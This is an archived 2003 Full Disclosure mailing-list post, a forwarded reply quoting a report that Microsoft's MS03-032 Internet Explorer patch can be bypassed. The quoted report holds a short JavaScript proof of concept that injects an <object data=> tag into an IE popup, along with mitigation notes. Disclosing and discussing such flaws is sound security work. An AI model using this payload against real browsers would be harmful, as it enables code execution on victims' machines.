Full Disclosure mailing list archives
FW: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Richard M. Smith" <rms () computerbytesman com>
Date: Sun, 7 Sep 2003 14:42:46 -0400
-----Original Message----- From: Richard M. Smith [mailto:rms () computerbytesman com] Sent: Sunday, September 07, 2003 2:20 PM To: 'full-disclosure () lists netsys com' Subject: RE: [Full-disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032 Hi, Very interesting catch. What made you think of checking Internet Explorer popup windows to see if they still had the bug? Do other special IE windows like help and modal dialog windows have the same problem? Do we have guesses why Microsoft didn't check IE more carefully to fully understand the extent of the <OBJECT DATA=> security hole? Richard M. Smith http://www.ComputerBytesMan.com -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of http-equiv () excite com Sent: Sunday, September 07, 2003 9:17 AM To: full-disclosure () lists netsys com Subject: [Full-disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032 Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News": The patch for Drew's object data=funky.hta doesn't work: http://www.malware.com/badnews.html <script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=ouch.php>"; oPopup.show(0,0,1,1,document.body); } showPopup() </script> Notes: 1. Disable Active Scripting 2. In case that does not work, uninstall Internet Explorer 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html 4. This was sent to the manufacturer quite some time prior to this going out. Surprisingly no immediate acknowledgement 5. This is so blatantly obvious, in particular because it is the coupling of two known issues[one current + one from 2002]: http://www.securityfocus.com/bid/3867/ It is beyond comprehension why this was not checked from the outset as it is a known issue plus file://::{CLSID}in the control panel in the object tag still functions to date. 6. At this stage one must really question the compentency of this particular operation. This is a pathetic oversight. -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 morning_wood (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Fabio Gomes de Souza (Sep 08)
- <Possible follow-ups>
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick Jacobsen (Sep 07)
- FW: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 GreyMagic Software (Sep 08)
- Re: [VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Thomas Kristensen (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 ADBecker (Sep 08)
- Re: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick FitzGerald (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Thor Larholm (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nathan Wallwork (Sep 09)
- (Patch Updated) Microsoft Security Bulletin MS03-032 Jim (Sep 09)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 10)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Crist J. Clark (Sep 12)
(Thread continues...)